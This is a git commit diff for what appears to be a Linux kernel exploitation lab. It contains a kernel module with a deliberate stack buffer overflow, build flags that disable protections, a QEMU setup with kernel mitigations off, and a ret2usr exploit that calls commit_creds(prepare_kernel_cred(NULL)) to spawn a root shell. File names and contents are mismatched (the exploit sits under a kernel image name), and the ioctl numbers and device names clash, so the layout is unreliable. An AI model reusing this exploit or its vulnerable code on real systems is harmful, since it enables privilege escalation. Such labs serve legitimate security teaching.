initial commit

Author: sashs

environment/Dockerfile

@@ -0,0 +1,2 @@
+FROM ubuntu:22.04
+RUN apt update && apt install -y zstd cpio python3 git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison

environment/initramfs.cpio.gz

@@ -0,0 +1,9 @@
+qemu-system-x86_64 -kernel vmlinuz-5.13.19 \
+	-nographic \
+	-initrd initramfs.cpio.gz \
+	-m 512 \
+	-cpu kvm64 \
+	-s \
+	-append "console=ttyS0 nokaslr nopti nosmep nosmap quiet panic=1"
+
+	# freeze cpu on startup -S \

environment/start.sh

@@ -0,0 +1,10 @@
+##
+# Project Title
+#
+# @file
+# @version 0.1
+
+default:
+	gcc vuln1_exploit.c -static -o vuln1_exploit
+
+# end

environment/vmlinuz-5.13.19

@@ -0,0 +1,89 @@
+#include "stdlib.h"
+#include "stdio.h"
+#include "string.h"
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+
+#define IOCTL_VULN1_WRITE 4141
+#define COMMIT_CREDS_ADDRESS 0xffffffff810d26f0ul
+#define PREPARE_KERNEL_CRED_ADDRESS 0xffffffff810d2950ul
+
+typedef int (* t_commit_creds)(void *);
+typedef void *(* t_prepare_kernel_cred)(void *);
+
+t_commit_creds commit_creds = (t_commit_creds)COMMIT_CREDS_ADDRESS;
+t_prepare_kernel_cred prepare_kernel_cred = (t_prepare_kernel_cred)PREPARE_KERNEL_CRED_ADDRESS;
+
+unsigned long u_cs;
+unsigned long u_ss;
+unsigned long u_rsp;
+unsigned long u_rflags;
+unsigned long u_rip;
+
+void start_sh() {
+    char *args[] = {"/bin/sh", "-i", NULL};
+    execve("/bin/sh", args, NULL);
+}
+
+void save_state() {
+    __asm__(
+        ".intel_syntax noprefix;"
+        "mov u_cs, cs;"
+        "mov u_ss, ss;"
+        "mov u_rsp, rsp;"
+        "pushf;"
+        "pop u_rflags;"
+        ".att_syntax;"
+        );
+    u_rip = (unsigned long)&start_sh;
+}
+
+void restore_state() {
+        __asm__(
+            ".intel_syntax noprefix;"
+            "swapgs;""push u_ss;"     // restore gs reg and push all
+            "push u_rsp;"             // other values to the stack
+            "push u_rflags;"
+            "push u_cs;"
+            "push u_rip;"             // points to start_sh
+            "iretq;"
+            ".att_syntax;"
+            );
+}
+
+
+void exploit(){
+
+  commit_creds(prepare_kernel_cred(NULL));
+
+  restore_state();
+
+}
+
+void ioctl_write(int fd){
+
+	char buffer[512];
+	memset(buffer, 0x41, sizeof(buffer));
+
+  // overwrite return address
+  *(unsigned long *)&buffer[0x108] = (unsigned long) &exploit;
+
+  //save user state
+  save_state();
+	ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
+}
+
+void main()
+{
+  int fd;
+
+  fd = open("/dev/vuln1", 0);
+  if (fd < 0) {
+    printf ("Cannot open device file");
+    exit(-1);
+  }
+
+  ioctl_write(fd);
+  close(fd);
+}

exploits/vuln1/Makefile

@@ -0,0 +1,19 @@
+obj-m := vuln1.o
+KDIR := /lib/modules/$(shell uname -r)/build
+PWD := $(shell pwd)
+
+# Don't create .text.unlikely/.text.hot sections.
+EXTRA_CFLAGS += -fno-reorder-functions
+
+# Disable stack protector to allow exploiting stack buffer overflows.
+EXTRA_CFLAGS += -fno-stack-protector
+
+EXTRA_CFLAGS += -g -DDEBUG
+ccflags-y += ${EXTRA_CFLAGS}
+CC += ${EXTRA_CFLAGS}
+
+default:
+	$(MAKE) -C $(KDIR) M=$(PWD) SUBDIRS=$(PWD) modules
+
+clean:
+	$(MAKE) -C $(KDIR) M=$(PWD) SUBDIRS=$(PWD) clean

exploits/vuln1/vuln1_exploit.c

@@ -0,0 +1,64 @@
+#include <linux/compiler.h>
+#include <linux/fs.h>
+#include <linux/kernel.h>
+#include <linux/miscdevice.h>
+#include <linux/module.h>
+#include <linux/uaccess.h>
+
+
+MODULE_DESCRIPTION("vuln1 buffer overflow");
+MODULE_AUTHOR("sashs");
+MODULE_LICENSE("GPL");
+
+#define IOCTL_VULN_WRT 1337
+
+static int vuln1_open(struct inode *inode, struct file *file)
+{
+	return 0;
+}
+
+static int vuln1_release(struct inode *inodep, struct file *filp)
+{
+	return 0;
+}
+
+static noinline int vuln1_do_breakstuff(unsigned long addr)
+{
+	char buffer[256];
+	volatile int size = 512;
+
+	return _copy_from_user(&buffer, (void __user *)addr, size);
+}
+
+static long vuln1_ioctl(struct file *fd, unsigned int cmd, unsigned long value)
+{
+	long to_return;
+
+	switch (cmd) {
+		case IOCTL_VULN_WRT:
+			to_return = vuln1_do_breakstuff(value);
+			break;
+		default:
+			to_return = -EINVAL;
+			break;
+	}
+
+	return to_return;
+}
+
+static const struct file_operations vuln1_fops = {
+	.owner		= THIS_MODULE,
+	.open		= vuln1_open,
+	.unlocked_ioctl = vuln1_ioctl,
+	.release	= vuln1_release,
+	.llseek 	= no_llseek,
+};
+
+struct miscdevice vuln1_device = {
+	.minor	= MISC_DYNAMIC_MINOR,
+	.name	= "vuln",
+	.mode	= S_IRUGO | S_IWUGO,
+	.fops	= &vuln1_fops,
+};
+
+module_misc_device(vuln1_device);